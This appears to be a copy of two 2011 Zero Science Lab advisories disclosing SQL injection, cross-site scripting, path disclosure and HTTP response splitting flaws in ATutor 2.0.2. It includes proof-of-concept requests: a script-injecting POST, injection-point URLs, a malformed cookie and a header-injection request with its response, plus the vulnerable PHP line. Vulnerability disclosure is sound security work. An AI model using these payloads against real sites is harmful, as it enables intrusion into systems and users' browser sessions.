150 lines
No EOL
4.1 KiB
Text
150 lines
No EOL
4.1 KiB
Text
ATutor 2.0.2 Multiple Remote Vulnerabilities (SQLi/XSS/PD)
|
|
|
|
|
|
Vendor: ATutor (Inclusive Design Institute)
|
|
Product web page: http://www.atutor.ca
|
|
Affected version: 2.0.2 (build r10589)
|
|
|
|
Summary: ATutor is an Open Source Web-based Learning Content Management
|
|
System (LCMS) designed with accessibility and adaptability in mind.
|
|
Educators can quickly assemble, package, and redistribute Web-based
|
|
instructional content, easily retrieve and import prepackaged content,
|
|
and conduct their courses online.
|
|
|
|
|
|
Desc: ATutor suffers from sql injection, cross-site scripting and path
|
|
disclosure vulnerabilities.
|
|
|
|
The XSS issue is triggered when input passed via the 'search_friends_HASH'
|
|
POST parameter, where HASH is the value generated by the 'rand_key' parameter,
|
|
to the '/mods/_standard/social/index_public.php' script is not properly
|
|
sanitised before being returned to the user.
|
|
|
|
The PD issues can be triggered by the cookie variable 'ATutorID' when setting random
|
|
value or none in various scripts.
|
|
|
|
The SQLi issue can be triggered by 'p_course', 'name' and 'value' parameters in
|
|
'/mods/_standard/social/set_prefs.php' script.
|
|
|
|
Theese issues can be exploited to execute arbitrary HTML and script code in a
|
|
user's browser session in context of an affected site, displaying the full
|
|
installation path in an error report and to manipulate SQL queries by injecting
|
|
arbitrary SQL code.
|
|
|
|
|
|
Tested on: Microsoft Windows XP Professional SP3 (EN)
|
|
Apache 2.2.14 (Win32)
|
|
PHP 5.3.1
|
|
MySQL 5.1.41
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2011-5036
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5036.php
|
|
|
|
|
|
31.07.2011
|
|
|
|
|
|
|
|
PoC:
|
|
|
|
|
|
XSS:
|
|
---------------------
|
|
|
|
POST http://localhost/ATutor/mods/_standard/social/index_public.php HTTP/1.0
|
|
|
|
search_friends_2c62c1e5aff70ba8a3268d1d1885a600=1>"><script>alert(1)</script>&search=Search&rand_key=2c62c1e5aff70ba8a3268d1d1885a600
|
|
|
|
|
|
SQLi:
|
|
---------------------
|
|
|
|
http://localhost/mods/_standard/social/set_prefs.php?cid=〈=&p_course=[INJECTION]&h=&expand=&oid=&id=&submit_language=&st=&name=[INJECTION]&value=[INJECTION]
|
|
|
|
|
|
PD:
|
|
---------------------
|
|
|
|
GET /documentation/common/frame_header.php HTTP/1.0
|
|
Accept: */*
|
|
Host: localhost
|
|
Cookie: ATutorID=-1.0
|
|
Connection: Close
|
|
Pragma: no-cache
|
|
|
|
|
|
|
|
ATutor 2.0.2 (lang) HTTP Response Splitting Vulnerability
|
|
|
|
|
|
Vendor: ATutor (Inclusive Design Institute)
|
|
Product web page: http://www.atutor.ca
|
|
Affected version: 2.0.2 (build r10589)
|
|
|
|
Summary: ATutor is an Open Source Web-based Learning Content Management
|
|
System (LCMS) designed with accessibility and adaptability in mind.
|
|
Educators can quickly assemble, package, and redistribute Web-based
|
|
instructional content, easily retrieve and import prepackaged content,
|
|
and conduct their courses online.
|
|
|
|
Desc: Input passed to the 'lang' parameter in '/documentation/index_list.php'
|
|
is not properly sanitised before being returned to the user. This can be
|
|
exploited to insert arbitrary HTTP headers, which are included in a response
|
|
sent to the user.
|
|
|
|
|
|
======================== vulnerable code ========================
|
|
|
|
/documentation/index_list.php:
|
|
------------------------------
|
|
|
|
1: <?php
|
|
2: header('Location: index/index.php?'.$_GET['lang']);
|
|
3: exit;
|
|
4: ?>
|
|
|
|
======================= /vulnerable code ========================
|
|
|
|
|
|
Tested on: Microsoft Windows XP Professional SP3 (EN)
|
|
Apache 2.2.14 (Win32)
|
|
PHP 5.3.1
|
|
MySQL 5.1.41
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2011-5037
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5037.php
|
|
|
|
|
|
31.07.2011
|
|
--
|
|
|
|
|
|
[GET] http://10.0.0.13/documentation/index_list.php?lang=%0d%0a%20ZSL%2dCustom%2dHeader%3alove_injection
|
|
|
|
----
|
|
|
|
HTTP/1.1 302 Found
|
|
Date: Sun, 31 Jul 2011 21:08:54 GMT
|
|
Server: Apache/2.2.14 (Win32)
|
|
X-Powered-By: PHP/5.3.1
|
|
Location: index/index.php?
|
|
ZSL-Custom-Header: love_injection
|
|
Content-Length: 0
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
|
|
|
|
--
|
|
Copyleft (c) Zero Science Lab - Information Security Services
|
|
This advisory is best viewed in maximized Notepad on 1680x1050 screen resolution. |